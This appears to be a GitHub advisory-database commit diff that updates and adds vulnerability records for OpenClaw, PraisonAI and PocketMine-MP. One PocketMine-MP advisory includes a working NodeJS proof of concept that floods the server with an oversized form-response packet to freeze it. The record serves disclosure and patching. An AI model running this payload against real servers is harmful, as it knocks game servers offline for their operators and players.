Publish Advisories

GHSA-9528-x887-j2fp
GHSA-gm9m-x74r-8whg
GHSA-44c2-3rw4-5gvh
GHSA-6vh2-h83c-9294
GHSA-788v-5pfp-93ff
GHSA-7hmv-4j2j-pp6f
GHSA-8w9j-hc3g-3g7f
GHSA-98f9-fqg5-hvq5
GHSA-9cq8-3v94-434g
GHSA-9gm9-c8mq-vq7m
GHSA-cfh6-vr3j-qc3g
GHSA-f9jp-856v-8642
GHSA-fvx6-pj3r-5q4q
GHSA-h6rj-3m53-887h
GHSA-r4f2-3m54-pp7q
GHSA-rf75-g96h-j3rm
GHSA-w37c-qqfp-c67f
GHSA-x6m9-gxvr-7jpv
GHSA-gm9m-x74r-8whg
GHSA-rf75-g96h-j3rm

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-9528-x887-j2fp/GHSA-9528-x887-j2fp.json

@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-9528-x887-j2fp",
-  "modified": "2026-04-06T17:34:29Z",
+  "modified": "2026-04-06T22:53:25Z",
   "published": "2026-03-31T23:59:17Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-33580"
+  ],
   "summary": "OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication",
   "details": "## Summary\n\nNextcloud Talk webhook signature failures were not throttled even though the integration relies on an operator-configured shared secret that may be weak.\n\n## Impact\n\nAn attacker who could reach the webhook endpoint could brute-force weak secrets online and then forge inbound webhook events.\n\n## Affected Component\n\n`extensions/nextcloud-talk/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e403decb6e` (`nextcloud-talk: throttle repeated webhook auth failures`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
   "severity": [],
@@ -36,6 +38,10 @@
       "type": "WEB",
       "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"
@@ -47,6 +53,10 @@
     {
       "type": "WEB",
       "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication"
     }
   ],
   "database_specific": {

advisories/github-reviewed/2026/03/GHSA-gm9m-x74r-8whg/GHSA-gm9m-x74r-8whg.json

@@ -0,0 +1,68 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-gm9m-x74r-8whg",
+  "modified": "2026-04-06T22:53:20Z",
+  "published": "2026-03-31T15:31:56Z",
+  "withdrawn": "2026-04-06T22:53:20Z",
+  "aliases": [],
+  "summary": "Duplicate Advisory: OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication",
+  "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9528-x887-j2fp. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a missing rate limiting vulnerability in the Nextcloud Talk webhook authentication that allows attackers to brute-force weak shared secrets. Attackers who can reach the webhook endpoint can exploit this to forge inbound webhook events by repeatedly attempting authentication without throttling.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    },
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "openclaw"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2026.3.28"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-307"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-06T22:53:20Z",
+    "nvd_published_at": "2026-03-31T15:16:15Z"
+  }
+}

advisories/github-reviewed/2026/04/GHSA-44c2-3rw4-5gvh/GHSA-44c2-3rw4-5gvh.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-44c2-3rw4-5gvh",
-  "modified": "2026-04-01T23:27:07Z",
+  "modified": "2026-04-06T22:54:29Z",
   "published": "2026-04-01T23:27:07Z",
   "aliases": [
     "CVE-2026-34954"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-44c2-3rw4-5gvh"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34954"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/MervinPraison/PraisonAI"
@@ -55,6 +59,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2026-04-01T23:27:07Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-04-03T23:17:06Z"
   }
 }

advisories/github-reviewed/2026/04/GHSA-6vh2-h83c-9294/GHSA-6vh2-h83c-9294.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-6vh2-h83c-9294",
-  "modified": "2026-04-01T23:17:48Z",
+  "modified": "2026-04-06T22:54:12Z",
   "published": "2026-04-01T23:17:48Z",
   "aliases": [
     "CVE-2026-34938"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6vh2-h83c-9294"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34938"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/MervinPraison/PraisonAI"
@@ -55,6 +59,6 @@
     "severity": "CRITICAL",
     "github_reviewed": true,
     "github_reviewed_at": "2026-04-01T23:17:48Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-04-03T23:17:06Z"
   }
 }

advisories/github-reviewed/2026/04/GHSA-788v-5pfp-93ff/GHSA-788v-5pfp-93ff.json

@@ -0,0 +1,63 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-788v-5pfp-93ff",
+  "modified": "2026-04-06T22:54:07Z",
+  "published": "2026-04-06T22:54:07Z",
+  "aliases": [],
+  "summary": "PocketMine-MP: JSON decoding of unlimited size large arrays/objects in ModalFormResponse Handling",
+  "details": "### Impact\n\nThe server does not meaningfully limit the size of the JSON payload in `ModalFormResponsePacket`. This can be abused by an attacker to waste memory and CPU on an affected server, e.g. by sending arrays with millions of elements.\n\nThe player must have a full session on the server (i.e. spawned in the world) to exploit this, as form responses are not handled unless the player is in game.\n\n### Patches\nThe issue was fixed in two parts:\n- cef1088341e40ee7a6fa079bca47a84f3524d877 limits the size of a single form response to 10 KB, which is well above expected size, but low enough to prevent abuse\n- f983f4f66d5e72d7a07109c8175799ab0ee771d5 avoids decoding the form response if there is no form associated with the given ID\n\n### Workarounds\nThis issue can be worked around in a plugin using `DataPacketReceiveEvent` by:\n- checking the max size of the `formData` field\n- making sure the form ID is not repeated\n\nHowever, a full workaround for the issue would require reflection to access the `Player->forms` property, which is not exposed via any accessible API prior to 5.39.2.\n\n### PoC\n\n1. Join a PocketMine-MP server as a regular player (no special permissions needed).\n2. Use a modified client or packet-sending script to send a `ModalFormResponsePacket` with:\n\n   * Any non-existent `formId`\n   * `formData` containing a massive JSON array (e.g., 10+ MB payload).\n3. The server will attempt to parse the JSON and may freeze or become unresponsive.\n\nExample NodeJS pseudocode:\n\n```javascript\nimport { createClient } from 'bedrock-protocol';\n\nconst host = '127.0.0.1';\nconst port = 19132;\nconst username = 'Test';\n\nconst client = createClient({\n  host,\n  port,\n  username,\n  offline: true\n});\n\nconst hugePayload = '[' + '0,'.repeat(5_000_000) + '0]';\n\nclient.on('spawn', () => {\n  console.log('[*] Connected & spawned. Sending malicious packet...');\n\n  client.write('modal_form_response', {\n    formId: 9999,       // Form inexistant\n    formData: hugePayload // JSON énorme\n  });\n\n  console.log('[*] Packet sent. The server should start freezing shortly.');\n});\n```",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "pocketmine/pocketmine-mp"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.39.2"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-788v-5pfp-93ff"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/pmmp/PocketMine-MP/commit/cef1088341e40ee7a6fa079bca47a84f3524d877"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/pmmp/PocketMine-MP/commit/f983f4f66d5e72d7a07109c8175799ab0ee771d5"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/pmmp/PocketMine-MP"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-770"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-06T22:54:07Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-7hmv-4j2j-pp6f/GHSA-7hmv-4j2j-pp6f.json

@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7hmv-4j2j-pp6f",
+  "modified": "2026-04-06T22:54:10Z",
+  "published": "2026-04-06T22:54:10Z",
+  "aliases": [],
+  "summary": "PocketMine-MP: Network amplification vulnerability with `ActorEventPacket`",
+  "details": "### Impact\nThe server handles `ActorEventPacket` to trigger consuming animations from vanilla clients when they eat food or drink potions.\n\nThis can be abused to make the server spam other clients, and to waste server CPU and memory. For every `ActorEventPacket` sent by the client, an animation event will be sent to every other player the attacker is visible to.\n\nThis is similar to various other vulnerabilities which were fixed in the network overhaul of PM4 (e.g. `AnimatePacket` and `LevelSoundEventPacket`), but somehow this one slipped through the net.\n\n### Patches\nThe problem was addressed in aeea1150a772a005b92bd418366f1b7cf1a91ab5 by changing the mechanism for consuming animations to be fully controlled by the server. `ActorEventPacket` from the client is now discarded.\n\n### Workarounds\nA plugin could use `DataPacketDecodeEvent` to rate-limit `ActorEventPacket` to prevent the attack.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "pocketmine/pocketmine-mp"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.39.2"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-7hmv-4j2j-pp6f"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/pmmp/PocketMine-MP/commit/aeea1150a772a005b92bd418366f1b7cf1a91ab5"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/pmmp/PocketMine-MP"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-406"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-06T22:54:10Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-8w9j-hc3g-3g7f/GHSA-8w9j-hc3g-3g7f.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-8w9j-hc3g-3g7f",
-  "modified": "2026-04-01T23:21:08Z",
+  "modified": "2026-04-06T22:54:16Z",
   "published": "2026-04-01T23:21:08Z",
   "aliases": [
     "CVE-2026-34939"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8w9j-hc3g-3g7f"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34939"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/MervinPraison/PraisonAI"
@@ -55,6 +59,6 @@
     "severity": "MODERATE",
     "github_reviewed": true,
     "github_reviewed_at": "2026-04-01T23:21:08Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-04-03T23:17:06Z"
   }
 }

advisories/github-reviewed/2026/04/GHSA-98f9-fqg5-hvq5/GHSA-98f9-fqg5-hvq5.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-98f9-fqg5-hvq5",
-  "modified": "2026-04-01T23:29:01Z",
+  "modified": "2026-04-06T22:54:25Z",
   "published": "2026-04-01T23:29:01Z",
   "aliases": [
     "CVE-2026-34953"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34953"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/MervinPraison/PraisonAI"
@@ -55,6 +59,6 @@
     "severity": "CRITICAL",
     "github_reviewed": true,
     "github_reviewed_at": "2026-04-01T23:29:01Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-04-03T23:17:06Z"
   }
 }

advisories/github-reviewed/2026/04/GHSA-9cq8-3v94-434g/GHSA-9cq8-3v94-434g.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-9cq8-3v94-434g",
-  "modified": "2026-04-01T23:20:33Z",
+  "modified": "2026-04-06T22:53:53Z",
   "published": "2026-04-01T23:20:32Z",
   "aliases": [
     "CVE-2026-34934"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9cq8-3v94-434g"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34934"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/MervinPraison/PraisonAI"
@@ -55,6 +59,6 @@
     "severity": "CRITICAL",
     "github_reviewed": true,
     "github_reviewed_at": "2026-04-01T23:20:32Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-04-03T23:17:05Z"
   }
 }